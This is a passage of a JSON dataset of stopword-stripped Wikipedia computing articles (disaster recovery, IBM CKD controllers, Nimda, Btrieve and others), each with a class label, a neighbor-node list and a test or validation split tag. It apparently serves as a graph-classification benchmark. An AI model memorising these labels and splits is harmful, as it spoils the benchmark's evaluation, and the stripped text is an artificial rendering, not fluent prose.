    "text": "Disaster_recovery:disaster recovery disaster recovery involves set policies tools procedures enable recovery continuation vital technology infrastructure systems following natural human-induced disaster disaster recovery focuses technology systems supporting critical business functions opposed business continuity involves keeping essential aspects business functioning despite significant disruptive events disaster recovery therefore considered subset business continuity service continuity itsc subset business continuity planning bcp encompasses disaster recovery planning wider resilience planning also incorporates elements infrastructure services relate communications voice telephony data communications itsc plan reflects recovery point objective rpo recent transactions recovery time objective rto time intervals planning includes arranging backup sites hot warm cold standby sites hardware needed continuity 2008 british standards institution launched specific standard connected supporting business continuity standard bs 25999 titled bs25777 specifically align computer continuity business continuity withdrawn following publication march 2011 iso/iec 27031 security techniques — guidelines information communication technology readiness business continuity itil defined terms recovery time objective rto targeted duration time service level within business process must restored disaster disruption order avoid unacceptable consequences associated break business continuity accepted business continuity planning methodology rto established business impact analysis bia owner process including identifying options time frames alternate manual workarounds good deal literature subject rto spoken complement recovery point objective rpo two metrics describing limits acceptable tolerable itsc performance terms time lost rto normal business process functioning terms data lost backed period time rpo respectively forbes overview noted recovery time actual rta critical metric business continuity disaster recovery rta established exercises actual events business continuity group times rehearsals actuals makes needed refinements recovery point objective rpo defined business continuity planning maximum targeted period data transactions might lost service due major incident rpo measured minutes even hours practice off-site mirrored backups must continuously maintained daily off-site backup tape suffice recovery instantaneous restore data/transactions period time goal without incurring significant risks significant losses rpo measures maximum time period recent data might permanently lost event major incident direct measure quantity loss instance bc plan restore last available backup rpo maximum interval backup safely vaulted offsite business impact analysis used determine rpo service rpo determined existent backup regime level preparation off-site data required period data might lost often starts near time beginning work prepare backups time backups taken off-site although data synchronization point point time timing performing physical backup must included one approach used halt processing update queue disk-to-disk copy made backup reflects earlier time copy operation data copied tape transmitted elsewhere rto rpo must take business risk account along major system design criteria rpo tied times backups sent offsite offsiting via synchronous copies offsite mirror allows unforeseen difficulty use physical transportation tapes transportable media comfortably covers backup needs relatively low cost recovery enacted predetermined site shared offsite space hardware completes package needed high volumes high value transaction data hardware split across two sites splitting across geographic areas adds resiliency planning disaster recovery information technology developed mid- late 1970s computer center managers began recognize dependence organizations computer systems time systems batch-oriented mainframes another offsite mainframe could loaded backup tapes pending recovery primary site downtime relatively less critical disaster recovery industry developed provide backup computer centers one earliest centers located sri lanka sungard availability services 1978 1980s 90s internal corporate timesharing online data entry real-time processing grew availability systems needed regulatory agencies became involved even rapid growth internet 2000s objectives 2 3 4 5 nines 99.999 often mandated high-availability solutions hot-site facilities sought service continuity essential many organizations implementation business continuity management bcm information security management icm part implementation operation information security management well business continuity management specified iso/iec 27001 iso 22301 respectively rise cloud computing since 2010 continues trend nowadays matters even less computing services physically served long network sufficiently reliable separate issue less concern since modern networks highly resilient design 'recovery service raas one security features benefits cloud computing promoted cloud security alliance disasters classified two broad categories first natural disasters floods hurricanes tornadoes earthquakes preventing natural disaster impossible risk management measures avoiding disaster-prone situations good planning help second category man-made disasters hazardous material spills infrastructure failure bio-terrorism disastrous bugs failed change implementations instances surveillance testing mitigation planning invaluable recent research supports idea implementing holistic pre-disaster planning approach cost-effective long run every 1 spent hazard mitigation disaster recovery plan saves society 4 response recovery costs 2015 disaster recovery statistics suggest downtime lasting one hour cost systems become increasingly critical smooth operation company arguably economy whole importance ensuring continued operation systems rapid recovery increased example companies major loss business data 43 never reopen 29 close within two years result preparation continuation recovery systems needs taken seriously involves significant investment time money aim ensuring minimal losses event disruptive event control measures steps mechanisms reduce eliminate various threats organizations different types measures included disaster recovery plan drp disaster recovery planning subset larger process known business continuity planning includes planning resumption applications data hardware electronic communications networking infrastructure business continuity plan bcp includes planning non-it related aspects key personnel facilities crisis communication reputation protection refer disaster recovery plan drp related infrastructure recovery continuity disaster recovery control measures classified following three types good disaster recovery plan measures dictate three types controls documented exercised regularly using so-called dr tests prior selecting disaster recovery strategy disaster recovery planner first refers organization business continuity plan indicate key metrics recovery point objective recovery time objective metrics business processes mapped systems infrastructure failure properly plan extend disaster impact metrics mapped organization reviews budget rto rpo metrics must fit available budget cost-benefit analysis often dictates disaster recovery measures implemented adding cloud-based backup benefits local offsite tape archiving new york times wrote adds layer data protection common strategies data protection include many cases organization may elect use outsourced disaster recovery provider provide stand-by site systems rather using remote facilities increasingly via cloud computing addition preparing need recover systems organizations also implement precautionary measures objective preventing disaster first place may include disaster recovery service draas arrangement third party although vendor lists published disaster recovery product even though several large hardware vendors developed mobile/modular offerings installed made operational short time",
    "neighbors": [
      11393,
      6019,
      8195,
      2693,
      5384,
      1801,
      10120,
      2965,
      11157,
      4505,
      1314,
      6692,
      6565,
      3366,
      7979,
      8875,
      3757,
      8239,
      1840,
      6834,
      4154,
      10303,
      9665,
      7874,
      1990,
      3450,
      9678,
      1362,
      10711,
      8792,
      9184,
      4194,
      9828,
      3692,
      3181,
      11250,
      5491,
      5370,
      3323,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 6515,
    "label": 2,
    "text": "History_of_IBM_CKD_Controllers:history ibm ckd controllers beginning 1964 system/360 announcement ibm mainframes initially accessed ckd count key data subsystems via channel connected separate storage control units scus attached direct access storage devices dasd typically hard disk drive practice continued ibm larger mainframes thru system/370 however low end systems generally used lower cost integrated attachments function scu combined channel typically called integrated file adapter system/360 selector channel followed system/370 block multiplexor channel could operate selector channel allow attachment legacy subsystems scu evolved director controller latter typically labelled a-unit a-box controller least one dasd physically a-unit integrated storage control isc director within cabinet ibm system director could attach one four a-units one conventional dasd labeled b-unit could attach a-unit following sections list order announcement ibm mainframe ckd storage controls categorized conventional storage controls director type storage controls integrated controls attaching a-unit storage control frequently called storage control unit attaches system/360 system/370 channel one logically separate devices control unit device comporting system/360 and/or system/370 input/output architecture since control unit attached devices logically distinct either busy i/o initiated either present ending status becomes free conventional dasd storage controls listed section different interfaces attached dasd unique dasd dasd family 1972 ibm introduced standard dasd control interface used director type storage controls ibm 2820 storage control unit scu connects one two selector channels attach one four 2301 drum storage units ibm 2841 storage control unit direct access storage device dasd control unit introduced system/360 first shipped 1965 offered least 1975 2841 microprogrammed control unit intended use controlling access disk strip file slow-speed drum storage unit connected one two standard system/360 channels could also attached ibm 1130 ibm 1800 data acquisition control system add support 2311 disks ibm 2841 storage control unit initially capable attaching combinations eight following dasd standard offering 2841 scu number 2311 dasd eight less eight units single type units intermixed example 2841 two 2303 drum storages supported six additional 2321 data cells features 2841 included two-channel switch file scan record overflow special features dasd devices introduced 2841 used different storage controls discussed following sections ibm 2314 family scus dasds scus connect one two selector channels attach one nine drives eight online plus one optional service drive accessible scu maintenance purposes model numbers reflect packaging differences otherwise versions 2314 family functionally models 2835 storage control connects one two block multiplexer channels attaches one two 2305 fixed head storage modules 3830 model 1 storage control unit connects one two four channels attach one eight 3330 dasd spindles 3380 model cj2 provides storage functions one 3380 dasd two devices storage control functions 3990 model two paths a-units single unit connects two four eight block multiplexor channels three 3380 b units models bj4 bk4 attached 3380 model cj2 providing head-of-storage-facility function 14 devices ibm storage control unit evolved director controller latter typically packaged labelled a-unit a-box controller least one dasd physically a-unit dasd unit without controller became known b-unit terms a-unit a-box b-unit initially used instead units containing controller dasds given product type numbers specifically 3333 a-unit containing 3330 dasd 3333-11 a-unit containing two double capacity 3330-11 dasds use suffixes b model number designate a-unit b-units began 3340 dasd 3340 model a2 3340 b2 respectively practice using digits suffix dasd model number represent type unit number dasd unit continued subsequent ckd dasd example 3380 model a4 one controller four access mechanisms one unit 3380 model aa4 two controllers four access mechanisms one unit 3380 model b4 four access mechanisms combination a-unit one optional b-units string string switch optional feature a-units allows controller a-unit switched two directors thereby providing additional paths string dasd 3830 model 2 storage control associated integrated storage controls announced august 1972 first instance storage control director a-units 3830-2 connects one two four block multiplexer channels attach combination four a-units i.e. combination 3333s 3340-a2s 3350-a2/a2fs maximum 32 physical drives 6 additional drives attached a-unit integrated storage control system/370 models 158 168 functions identically 3830-2 3830-3 attaches four 3333s 3350-a2/a2f/c2/c2fs additional functions support 3850 mass storage system 3350 drives used staging drives native mode integrated storage controller staging adapter functions identically 3830-3 ibm 3880 storage control models 1 2 3 two directors per cabinet director attach one two four eight block multiplexor channels model 4 one director attaches 3370 fba 3375 ckd strings storage director limited specific devices use diskettes storage director initialized attach exclusively one supported types strings first box string must a-unit remaining boxes must compatible b-units last 3350 3350 string 3350-c2 ibm allowed field upgrades among models 1 2 3 directors attach four intermixed 3330 3350 a-units four 3340 a-units two 3380 a-units 3380 storage control model 11 model 13 model 21 model 23 two directors director attach one two four block multiplexor channels large semiconductor buffers called subsystem storage added 3380 storage controls models 13 23 caching models 11 21 paging caching semiconductor buffers first introduced dasd ckd subsystems memorex 1978 storagetek 1981 3880 model 13 two caching storage directors access subsystem storage larger portion subsystem storage cache used store active data quick access smaller portion storage directory used locate data stored cache cache storage director attaches one two 3380 a-units turn attach three 3380 b-units total 16 devices 3380 dasd two actuators 3880 model 13 32 device addresses model 23 increased cache size somewhat improved performance otherwise performed functions paging well established computer dedicated ckd paging devices going back drums included s/360 announcement 1978 storagetek 4305 first ckd device using semiconductor memory paging 3880 model 11 two storage directors director 1 access subsystem storage paging director 2 nonpaging director 1 attaches one string eight 3350 dasds director 2 attaches combination one four 3330 a-units 3350 a-units a-unit attaching three additional b-units 32 dasds 3990 dual directors director attach four eight block multiplexor channels characteristics specific models include model 1 field upgraded model 2 3 model 6 improved reliability availability serviceability otherwise functionally model 3 january 4 1968 ibm announced system 360 model 25 included disk attachment control dac attaching four 2311 dasd integrated attachment simulates channel storage control unit cpu attached 2311 units merging functions dac eliminates need channel separate storage control differences 2311 connected 2841 scu one connected dac september 23 1970 ibm announced part system/370 model 145 new integrated file adapter along new 2319-a1 dasd march 8 1981 support 2319-a1 announced integrated file adapter part announcement system/370 model 135 2319-a1 contained three 2314 class disk drives plus piece storage control system unit conventional 2314 type dasd e.g. 2312 2313 and/or 2318 could attached 2319-a1 since could connect director type storage control 2319-a1 a-unit term came used ibm direct attachment 3333/3330 dasd subsystem 3340 dasf subsystem 3340/3344 das subsystem 3125-2 provided depending model features 16 spindles attached 3340 subsystem 3340 mdl a2 attached 3340 drives shared another s/370 except 3115-0 3125-0 via string switch capability 9315 direct attachment 3340 dasf subsystem 3340/3344 das subsystem 3115-2 provided depending model feature eight drives attached 3340 dasf subsystem via string switch feature 9315 3340 model a2 shared another s/370 except 3115-0 3125-0 one two 3330 3340 a-units attached integrated file adapter s/370 model 138 three appropriate b-units may attached a-unit 3344 b-units installed may installed first two possible strings three 3340 and/or 3344 b-units combination one two dasd adapters available depending upon model attachment one 3340 a-unit three additional 3340 3344 b-units providing eight devices string switch feature 3340 a-unit allows sharing 3340/3344 dasd another ibm processor director supports a-units string switching four 3340 a-units attached optional dasd adapter 3340 a-unit attached one three 3340 b-units 3344 b-units total 32 dasd four strings eight string switch feature 3340 a-unit allows sharing 3340/3344 dasd another ibm processor director supports a-units string switching",
    "neighbors": [
      2339,
      7173,
      7881,
      10508,
      5840,
      663
    ],
    "mask": "Test"
  },
  {
    "node_id": 6516,
    "label": 4,
    "text": "International_Computer_Security_Association:international computer security association icsa labs international computer security association began ncsa national computer security association mission increase awareness need computer security provide education various security products technologies early days ncsa focused almost solely certification anti-virus software using consortia model ncsa worked together anti-virus software vendors develop one first anti-virus software certification schemes past decade organization added certification programs security-related products changed name icsa verizon business providing resources research intelligence certification testing products including anti-virus firewall ipsec vpn cryptography ssl vpn network ips anti-spyware pc firewall products",
    "neighbors": [
      4421,
      2213,
      8998,
      10278,
      6985,
      11021,
      4464,
      4435,
      5749,
      4247,
      3962,
      3742,
      8703
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6517,
    "label": 4,
    "text": "Certified_Server_Validation:certified server validation certified server validation csv technical method email authentication intended fight spam focus smtp helo-identity mail transfer agents csv designed address problems marid asrg defined detail intent lightweight mta authentication protocol lmap expired asrg draft january 3 2007 internet drafts expired mailing list closed since traffic 6 months csv considers two questions start smtp session csv answers questions follows validate smtp session unknown sending smtp client using csv receiving smtp server level trust high enough process email session traditional manner delivering forwarding without need validation level trust low return error showing reason trusting sending smtp client level trust document result header email delivered forwarded and/or perform additional checks answers questions top article 'yes receivers expect email received email want mail sources motivated make answers yes easy unless email flow toxic reputable independent accreditation service vouch csv designed efficient elegant respect certainly beats spf coverage helo identities client smtp authorization csa proposed mechanism whereby domain admin advertise mail servers legitimate originators mail his/her domain done providing appropriate srv rrs dns infrastructure",
    "neighbors": [
      8202,
      10578,
      9532,
      9909
    ],
    "mask": "Test"
  },
  {
    "node_id": 6518,
    "label": 6,
    "text": "OpenSFS:opensfs open scalable file systems inc. opensfs nonprofit organization promoting lustre file system opensfs founded 2010 ensure lustre remains vendor-neutral open free lustre high-performance parallel file system deployed computational data centers including many top500 systems first started development 1999 accelerated strategic computing initiative path forward project initially released 2003 september 2007 sun microsystems acquired assets cluster file systems inc acquired oracle corporation 2010 announcements oracle 2010 lustre user group ongoing development lustre open-source project question prompting lustre developers leave oracle opensfs founded october 2010 steward open source software lustre community founding members cray datadirect networks lawrence livermore national laboratory oak ridge national laboratory april 2013 norman morse ceo since founded resigned replaced galen shipman ornl 2015 charlie carrol cray replaced shipman chairman lustre bof supercomuting'16 stephen simms announced stewardship opensfs transferred remaining board members cray intel seagate become user-driven organization simms assumed role interim president board elections lug 2017 2011 lustre 2.1 first community release endorsed opensfs opensfs began direct funding community releases early 2012 focused introducing new features targeted every six months maintenance releases targeted every three months opensfs solicited proposals february 2013 lustre feature development parallel file system tools addressing lustre technical issues parallel file system incubators opensfs-funded releases included lustre 2.5 october 2013 containing lustre+hsm integration capability opensfs established lustre community portal support open source community since 2011 opensfs charge organizing annual lustre user group lug event traditionally held april discussion seminars lustre opensfs held first annual apac lustre users group events china japan 2013",
    "neighbors": [
      3328,
      9665,
      7432,
      2135,
      1823
    ],
    "mask": "Test"
  },
  {
    "node_id": 6519,
    "label": 6,
    "text": "List_of_cryptographic_file_systems:list cryptographic file systems list filesystems support filesystem-level encryption confused full-disk encryption",
    "neighbors": [
      5120,
      2050,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      9281,
      8772,
      1109,
      8283,
      4708,
      9836,
      7789,
      5749,
      9333,
      6263,
      9335,
      9343,
      4746,
      7818,
      8331,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      251,
      3328,
      11012,
      2314,
      5899,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      3382,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      4435,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      376,
      11128,
      890,
      7554,
      10631,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      8631,
      1464,
      1978,
      8640,
      8643,
      7126,
      2015,
      7139,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 6520,
    "label": 4,
    "text": "Nimda:nimda nimda malicious file infecting computer worm quickly spread surpassing economic damage caused previous outbreaks code red first released advisory thread worm released september 18 2001 due release date exactly one week attacks world trade center pentagon media quickly began speculating link virus al qaeda though theory ended proving unfounded nimda affected user workstations clients running windows 95 98 nt 2000 xp servers running windows nt 2000 worm name origin comes reversed spelling admin f-secure found text concept virus cv v.5 copyright c 2001 r.p.china nimda code suggesting country origin nimda effective partially it—unlike infamous malware like code red—uses five different infection vectors",
    "neighbors": [
      3072,
      5636,
      4490,
      3852,
      6797,
      3473,
      3867,
      2461,
      9630,
      8363,
      10872,
      7983,
      3250,
      10297,
      9537,
      4439,
      1113,
      7515,
      4830,
      5087,
      4063,
      2147,
      1381,
      1254,
      8045,
      4462,
      9591,
      3704,
      2041
    ],
    "mask": "None"
  },
  {
    "node_id": 6521,
    "label": 1,
    "text": "Btrieve:btrieve btrieve transactional database navigational database software product based indexed sequential access method isam way storing data fast retrieval several versions product dos linux older versions microsoft windows 32-bit ibm os/2 novell netware originally record manager published softcraft btrieve written doug woodward nancy woodward initial funding provided part doug brother loyd woodward around time release first ibm pcs doug received 50 company wedding gift later purchased remainder brother gaining market share popularity acquired doug nancy woodward novell 1987 integration netware operating system addition continuing dos version product gained significant market share database embedded mid-market applications addition embedded every copy netware 2.x 3.x 4.x since available every netware network reorganization within novell decided 1994 spin product technology doug nancy woodward along ron harris developed new company known btrieve technologies inc. bti btrieve modularized starting version 6.15 became one two database front-ends plugged standard software interface called micro-kernel database engine btrieve front-end supported btrieve api front-end called scalable sql relational database product based upon mkde used variety structured query language otherwise known sql versions released btrieve 6.15 scalablesql v4 company renamed pervasive software prior ipo shortly thereafter btrieve scalablesql products combined products known sold pervasive.sql psql btrieve continued years scalablesql quickly dropped customers encouraged upgrade pervasive.sql supported sql btrieve applications btrieve relational database management system rdbms early descriptions btrieve referred record manager though pervasive initially used term navigational database later changed transactional database deals underlying record creation data retrieval record updating data deletion primitives uses isam underlying indexing storage mechanism key part pervasive architecture use microkernel database engine allows different database backends modularised integrated easily dbms package pervasive.sql enabled support btrieve navigational database engine sql-based engine scalable sql current versions btrieve support system transactions user transactions system transactions bundle non-transactional operations and/or user transactions whereas user transactions transactions work actual data database system transactions developed allow multiple transactions done batch make data recovery easier btrieve file format consists entirely pages data move memory storage engine performs i/o operation versions prior 6.0 merely used data pages index pages file control record fcr file index searching linked physical pages beginning version 6.0 logical pages used logical mapped physical pages pages fixed location file disk page allocation tables pats fcr record contains important information btrieve files number pages current use avoid database corruption btrieve uses two methods updating records pre-image paging btrieve versions 6.0 shadow paging subsequent versions primarily change-over pre-image paging shadow-paging necessitated radical file format changes caused compatibility issues version 6 previous versions btrieve owned developed four different companies softcraft novell btrieve technologies inc. later renamed pervasive software actian corporation committed loyal developer-base according company literature remain fully committed product pervasive software set btrieve society recognise existing developers dos btrieve version 5 terminate-and-stay-resident program functioned application programming interface api database engine supplying applications programs function calls implement multi-user database record locking network version worked similar way early years dos versions version 5 sold relatively high price order usd 1,000 executable terminate-and-stay-resident tsr database engine file could distributed applications without payment license fee product launched february 1982 softcraft firm located austin texas doug nancy woodward doug became vice-president handled software development nancy became president company released number versions next years february 1983 released btrieve 2.x series ms-dos 2.0 developed support file directory handles released btrieve 3.0 ms-dos 3.1 standardised internal interfaces march 1985 released btrieve 3.1 c/s one month later network client/server support february 1986 btrieve 4.0 released 4.1 upgrade released gained support extended key types supplemental indexes although btrieve fairly popular api database engine killer-app database manager pc dbase ii successors database management systems dbms could used either free-standing general-purpose application database programming language btrieve also expensive dbase although run-time licensing free charge btrieve grew developer base 5,000 users widely used financial area company took time create user-interface product however 1984 released xtrieve menu-driven program used new .ddf data dictionary enforce relational database rules 1987 novell started diversifying buying companies add netware operating system one companies purchased softcraft nancy woodward became vice-president general manager novell austin operations doug woodward became vice-president advanced database technologies early next year btrieve 5.0 released run native netware application vap value added process according jim kyle auto-increment key types brouter network process server data-only key-only files optional data compression version 5.1 released 1990 increased file-handling transaction capability logging roll-forward operations along several api enhancements several versions created dos os/2 microsoft windows version 6.0 released june 1992 however promoted extensively novell due enhancements change pre-imaging shadow-paging incompatible previous versions btrieve market increase much btrieve see wide adoption due issues company acquired novell softcraft working product called xql sql interpreter designed better deal industry standard sql xtrieve package fully compliant became basis netware sql initially released 1989 bare-bones sql interpreter implemented base ibm version sql 1994 novell largely given attempting make netware complete alternative operating system started selling many companies acquired years earlier minimally promoted btrieve largely due delay 24 months releasing version 6 negotiations woodward novell entered two years novell announced 26 jan 1994 going transfer ownership btrieve btrieve technologies incorporated also known bti 29 april 1994 transfer completed nancy woodward became chairman bti doug woodward made chief technical officer ceo position given ron harris former employee texas instruments one founding employees citrix systems inc. employed first director strategic planning vice-president marketing finally product group vice president btrieve totally rewritten 1 july 1994 btrieve 6.15 dos windows os/2 released novell sql renamed scalable sql reflecting change ownership company 1995 version 6.15 released novell netware windows nt server windows nt/95 thus became cross-platform database product concept micro kernel database engine mkde introduced version 1996 company renamed pervasive software product pervasive.sql 1997 company went public order allow greater penetration relational database market re-align sql vendor though still marketing developing btrieve pervasive completed ipo september company continued using mkde version 6.30 1997 pervasive released scalablesql 4.0 relational database product btrieve 7.0 2000 novell criticized ceased bundling pervasive.sql netware 5.1 first version affected instead shipped trial version shut 90 days latest version pervasive psql summit v11 released september 2010 2013 actian corporation acquired pervasive software february 2016 actian released btrieve 12 one dos client-based configuration btrieve created softcraft softcraft definition client-based version btrieve engine running particular workstation meant record-management engine connected directly files via operating system functions modified records accordingly whether files local network client-based engine allowed five concurrent users access database one time record processing done workstation engine installed btrieve dos used sefs mefs modes file sharing btrieve netware essentially btrieve dos extra features available netware time ran server process called codice_1 file-sharing server managed data i/o conjunction network file system server process first implemented netware value added process vap called codice_2 switched netware netware loadable module nlm soon codice_1 database engine dealt access records however also accepted requests transmission requested data another server via codice_4 process btrieve used requesters make database i/o requests client workstation requesters available dos os/2 microsoft windows unixware program codice_5 accepted i/o requests via btrieve api relayed codice_1 handled responses codice_1 relayed back appropriate application codice_4 process allowed incoming requests routed copy database another server loaded netware server dealt communication multiple server processes running file-server use two file server tables fsts according pervasive provide list server names addresses server routing table srt brouter also enabled communication requests routed correct server via spx looking codice_9 nlm coordinated locks mechanisms controlled access data btrieve database btrieve dos used sefs mefs modes file sharing able run network able use exclusive concurrent transactions btrieve windows created company rewrote codebase use mkde featured sefs mefs file sharing mechanisms used shadow-paging allowed exclusive concurrent locks handled version 6.x 6.1 files differently version 6.x files could handle operations part record rather locking entire record handled records larger 64kb implemented vats acss new data types allowed percentage operations record could located manipulated physical location file handled duplicate keys version 6.x capable dropping adding index fly version 6.0 could drop supplemental indexes version 6.1 files allowed concurrent system transactions optional renumbering keys case insensitive acs tables enhanced locking operations btrieve windows could run client database utilized sefs mefs modes could directly access btrieve server client-based version btrieve database files either directly local computer via mapped network drive set via dos codice_10 command applications make function call codice_11 loader requester interface loader requester module verify codice_12 configuration file correctly set load client-based btrieve engine turn loads local interface btrieve engine codice_13 necessary local interface loads btrieve engine codice_14 memory sends necessary database requests database engine calls various win32 system libraries perform file operations database files client-based version btrieve windows could access server-based versions btrieve via dos-based requester requestor required use dos protected mode interface dpmi allowed program access dos extended memory accessible via cpu protected mode client-based interface btrieve-based application makes call codice_11 loader requester interface library library checks codice_12 file see needs access data local system whether needs access data remote server needs access server uses windows version dpmi access dos-based requester named codice_5 requester establishes network connection server processes request passes back message requester database request completed btrieve windows nt windows 95 released 1995 along btrieve netware btrieve windows nt server reached version 6.15 started using mkde file sharing mechanisms remained still used sefs mefs file sharing modes shadow-paging allowed exclusive concurrent locks version btrieve allowed null values keys meant record could entered database information key available meant key would included index helped decrease unnecessary searching database via index also introduced concept system transaction user transaction see system user transactions mkde also allowed gaps auto-incremented keys variable-tail allocation tables introduced version 6.15 included windows nt/95 build btrieve two configurations btrieve windows nt/95 standalone workstation client/server using standalone workstation configuration btrieve processing records done local workstation workstation relies underlying mechanisms windows allow mkde codice_18 program gain direct access database files uses lock files deal concurrency issues configuration application makes calls btrieve api microkernel interface codice_19 call processed interface passed mkde codice_18 uses underlying operating system file system whether network local directly access database files leads peculiar issues btrieve uses windows file sharing database engine open files directly file share instance network instability e.g network cable disconnected update fields used link one btrieve file another become unsynchronized intents purposes data loses relationships links data database file get corrupted though chance reduced due pre-image paging using client/server server edition configuration btrieve processing records generally done windows file server via mapped drive way mapping file share virtual disk drive windows via codice_10 command utilises permissions assigned authenticating either log-on permissions permissions given codice_10 utilized windows 95 mkde interface windows dynamic link library dll called codice_19 determines database access method use via configuration file detects client/server workstation engines installed machine checks whether target set workstation server running windows nt server process codice_24 running along standalone workstation process codice_18 looks registry determine target server workstation cases mkde interface set workstation standalone workstation configuration uses mkde codice_18 access file directly set server mkde interface client uses communications module windows 95 codice_27 windows nt codice_28 talks server server matching communications module either codice_27 codice_28 resides mapped drive server dll communicates server mkde codice_24 updates records sends confirmation operation succeeded back communications module client advantage system network connection failure occurs mkde server able detect recover graceful manner workstation configuration able configuration utility included btrieve alter mkde settings settings could changed pervasive.sql 7 released march 1998 included scalable sql 4 btrieve 7.0 btrieve 7.0 ran platforms btrieve 6.x windows 95 windows nt 3.51 4 netware dos however company changed component-based architecture called smartcomponents resolve compatibility issues upgrades used component identification scheme embedded file encoded file name along dynamic binding glue files dlls loaded memory needed dynamic binding components done using new abstract os services dll looked latest version appropriate needed component via file name encoding glue module loaded memory used old log file format btrieve 6.x also replaced new centralised log called codice_32 unified enhanced log file format also improved error messages error message reporting mechanisms mkde retained pervasive.sql 7 however due new component architecture dynamic binding internal architecture modified application using btrieve calls services manager searches various configured directories specific encoded filename file name loaded btrieve files backus–naur form glue module dll loaded memory becomes interface mkde mkde determines whether configured workstation-based configuration server-based configuration passes requests via communications requester module onto database server directly modifies database files configured workstation mode pervasive.sql 2000 pervasive.sql 2000i uses essentially architecture pervasive.sql 7 though 2000i includes i*net server uses component model ability use btrieve scalable sql engines continues using mkde version included support red hat linux caldera openlinux suse solaris also better integration terminal services though one instance database engine may run terminal server platform run separate copies database engine within two terminal sessions introduced december 2002 pervasive.sql v8 improves performance btrieve sql applications using number new technologies v8 security feature pack mid-release product update designated 8.5 added important new security features designed lock pervasive.sql data files prior 8.5 access btrieve data controlled operating system security mechanism meant user needed read/write access database also needed read/write access underlying data files 8.5 introduced new security models allow administrators control access btrieve data using database security activated database security longer requires user access underlying files addition client/server configurations longer require use network shares mapped drives applications reference secure btrieve data using uri connection string pervasive psql v9 includes new java guis built eclipse framework guis available microsoft windows linux addition v9 included many sql performance syntax updates improving speed flexibility sql interfaces ado.net jdbc odbc ole db finally psql v9 expanded btrieve maximum file size 64gb 8.x earlier file formats 128 gb 9.0 format files 256gb files 9.5 file format conjunction psql v9 pervasive reintroduced ddf builder utility added support text searching full text search fts add-on later removed product line ddf builder provides mechanism btrieve users define meta data existing btrieve files thus allowing btrieve data accessible via sql tools utilities versions mkde retain full backward read-level compatibility earlier versions btrieve including pre-date introduction mkde change file version unless specifically requested btrieve files 5.x older file formats must rebuilt using gui command line rebuild utilities 6.x newer format support database writes 9.0 newer database engine pervasive psql v10 released september 2007 first version pervasive psql server client provide support 64-bit operating systems btrieve api distributing tuning interface dti enhanced support 64-bit pervasive psql workgroup components sdk enhanced 64-bit support release pervasive psql v10 timed offer support newly available windows vista soon arrive windows server 2008 operating systems pervasive psql v10 server workgroup client support windows vista pervasive psql v10 server certified windows server 2008 also included pervasive psql v10 xtreme i/o xio 32-bit windows database accelerator enabled access extended memory expand database cached past normal 2gb limit 32-bit windows systems xio also included update compression algorithms streamlined writing techniques improve database i/o performance digital license enforcement called product authorization introduced pervasive psql product line pervasive psql v10 product authorization initially implemented trial downloads e-commerce orders products sold pervasive distributor isv partners upgrade include product authorization release pervasive psql v10 sp3 november 2009 pervasive psql v10 sp3 also released windows 7 compatible application pervasive psql v10 retained backward compatibility using 9.5 file format increase maximum data file size 256gb increase maximum page size 16,384 bytes support netware windows nt windows 98 windows dos 6.22 16-bit applications dropped pervasive psql v10 although windows linux versions pervasive psql v9 products longer sold pervasive still sells supports pervasive psql v9 netware 2010 pervasive software released pervasive psql v11 allows users take full advantage multithreading faster database processing pervasive psql v11 released september 2010 one key drivers engineering effort behind pervasive psql v11 redesign database engine increase performance scalability multi-core cpu pervasive psql v11 optimizes parallel threads performing similar activities allowing database engage multiple cores task execution psql v11 also provides enhancements low-level synchronization mechanisms navigational interface multiple users read cached file pages simultaneously operations proceed independent cores non-user activity checkpoints log management run separate cores multiple users accessing independent files proceed different cores multi-core support available versions psql v11 32- 64-bit windows linux servers 32-bit workgroup internal testing pervasive documented performance increases 300 comparing psql v10 psql v11 8-core server running microsoft 2008 enterprise server sp2 64-bit ipv6 support windows included pervsive psql v11 continued support ipv4 environments pervasive psql v11 supports ipv6 btrieve dti distributed tuning interface access methods 64-bit server versions psql v11 include 64-bit relational/sql engine well 64-bit navigational/btrieve engine along 64-bit odbc driver driver installed 64-bit versions psql server psql client pervasive updated psql software development kit addition pervasive psql ado.net data provider 3.5 data provider 3.5 compliant .net framework versions 2.0 3.0 3.5 3.5 sp1 4.0 runs .net framework 4.0 support entity framework 1.0 features pervasive psql v11 also updated pdac pervasive direct access components access method support embardacero rad studio 2009 rad studio 2010 product authorization extended pervasive psql v11 include oem customers along introduction web-based portal oem generate keys manage licenses psql v11 telephone authorization method authorizing pervasive psql without requiring internet connection first introduced psql v11 made available pervasive customers pervasive psql v11 continues 9.5 file format maintaining backward compatibility previous releases support windows 2000 dropped pervasive psql v11 pervasive offers number add-on products extend basic features psql dbms latest versions products auditmaster v7 backup agent v3 dataexchange v4 released december 2010 february 2016 actian announced btrieve 12 actian say btrieve 12 new features compatible microsoft windows vista 10 windows server 2008 2012 file format api compatible btrieve 6.15 allowing read write btrieve 6.15 files earlier 16-bit dos applications",
    "neighbors": [
      9353,
      6797,
      8976,
      5401,
      3487,
      9762,
      7204,
      10413,
      7983,
      178,
      823,
      10560,
      9286,
      8393,
      9166,
      3791,
      5470,
      1247,
      736,
      5220,
      5612,
      4598,
      5371
    ],
    "mask": "None"
  },
  {
    "node_id": 6522,
    "label": 7,
